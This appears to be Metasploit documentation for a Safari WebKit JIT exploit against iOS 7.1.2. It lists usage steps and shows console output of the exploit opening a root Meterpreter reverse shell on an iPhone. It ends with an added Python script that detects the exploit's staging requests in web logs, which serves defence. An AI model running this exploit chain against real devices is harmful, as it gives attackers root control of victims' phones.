## Vulnerable Application

This module exploits a JIT optimization bug in Safari WebKit. This allows us to write shellcode to an RWX memory section in JavaScriptCore and execute it. The shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel read/write, obtains root and disables code signing. Finally, the module downloads and executes the Meterpreter payload.

This module has been tested against iOS 7.1.2 on an iPhone 4.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/apple_ios/browser/safari_jit`
1. Do: `set lhost [ip]`
1. Do: `set srvhost [ip]`
1. Do: `run`
1. Browse to the website with a vulnerable device
1. You should get a root shell.

## Options

### DEBUG_EXPLOIT

Show debug information during exploitation. This will add entries to the iPhone syslog related to exploitation and loading of the payload. Defaults to `false`.

## Scenarios

### iPhone 4 with iOS 7.1.2

```
msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2          safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2          safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2          safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2          safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2          safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400

sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
```
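The scenario output above shows the staging sequence a client goes through before a session opens: the landing page, then `/loader.b64`, `/macho.b64` and finally `/payload`, the last one fetched by CFNetwork rather than the Safari user agent. The following detection script is an added example and is not part of this module or of Metasploit; it assumes a web proxy or server log in Combined Log Format (the `SAMPLE_LOG` below is constructed, with the paths and user-agent strings taken from the output above) and flags any client that requests all three stage files in that order, reporting the iOS version parsed from its user agent.

```python
import re
from collections import OrderedDict

# Constructed sample access log in Combined Log Format. The request paths and
# user-agent strings are copied from the module's scenario output above; the
# timestamps, response sizes and the second, unrelated client are made up.
SAMPLE_LOG = """\
2.2.2.2 - - [04/Aug/2020:12:08:22 -0400] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2.2.2.2 - - [04/Aug/2020:12:08:23 -0400] "GET /loader.b64?cache=1596557302841 HTTP/1.1" 200 5678 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2.2.2.2 - - [04/Aug/2020:12:08:23 -0400] "GET /macho.b64?cache=1596557303179 HTTP/1.1" 200 91011 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2.2.2.2 - - [04/Aug/2020:12:08:25 -0400] "GET /payload HTTP/1.1" 200 200000 "-" "MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0"
3.3.3.3 - - [04/Aug/2020:12:09:00 -0400] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1"
"""

# Combined Log Format: ip ident user [timestamp] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Staging files in the order the module output shows them being requested.
STAGE_PATHS = ("/loader.b64", "/macho.b64", "/payload")

# MobileSafari reports the OS as e.g. "iPhone OS 7_1_2"; the patch level may be absent.
IOS_VERSION_RE = re.compile(r"iPhone OS (\d+)_(\d+)(?:_(\d+))?")


def parse_line(line):
    """Return a dict for one access-log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Drop the cache-busting query string so "/loader.b64?cache=..." compares as "/loader.b64".
    rec["path"] = rec["target"].split("?", 1)[0]
    return rec


def ios_version(user_agent):
    """Extract (major, minor, patch) from a MobileSafari user agent, or None if absent."""
    m = IOS_VERSION_RE.search(user_agent)
    if not m:
        return None
    return tuple(int(x) if x is not None else 0 for x in m.groups())


def find_staging_sequences(log_text):
    """Return one hit per client IP that fetched all stage files in STAGE_PATHS order."""
    clients = OrderedDict()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        info = clients.setdefault(
            rec["ip"], {"stages": [], "ios_version": None, "first_seen": rec["ts"]}
        )
        # The /payload fetch comes from CFNetwork, so keep the first Safari UA's version.
        ver = ios_version(rec["ua"])
        if info["ios_version"] is None and ver is not None:
            info["ios_version"] = ver
        if rec["path"] in STAGE_PATHS and rec["path"] not in info["stages"]:
            info["stages"].append(rec["path"])
    hits = []
    for ip, info in clients.items():
        if tuple(info["stages"]) == STAGE_PATHS:
            hits.append(
                {"ip": ip, "ios_version": info["ios_version"], "first_seen": info["first_seen"]}
            )
    return hits


if __name__ == "__main__":
    for hit in find_staging_sequences(SAMPLE_LOG):
        print(f"{hit['ip']} fetched the full staging sequence (iOS {hit['ios_version']}, first seen {hit['first_seen']})")
```

The order check matters: a single request for `/payload` is not unusual on its own, but a client that walks through the loader, the base64 Mach-O and then the raw payload within seconds matches the module's behaviour closely. The iOS version is reported as context for triage rather than used as a filter, since the page only states that iOS 7.1.2 was tested.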